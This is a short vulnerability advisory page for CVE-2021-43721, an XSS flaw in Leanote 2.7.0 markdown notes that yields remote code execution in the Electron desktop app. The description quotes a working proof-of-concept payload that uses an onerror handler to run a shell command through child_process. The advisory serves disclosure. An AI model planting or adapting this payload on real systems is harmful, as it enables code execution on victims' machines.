CVE-2021-43721

Published March 28th, 2022

View on NVD ↗

CVSS v3

6.1

MEDIUM

CVSS v2

4.3

MEDIUM

Affected

PROJECT

Description

Leanote 2.7.0 is vulnerable to Cross Site Scripting (XSS) in the markdown type note. This leads to remote code execution with payload : <video src=x onerror=(function(){require('child_process').exec('calc');})();>

leanote/desktop-app

Leanote Desktop App, based on Electron(atom-shell) http://leanote.org

GitHub

1.56K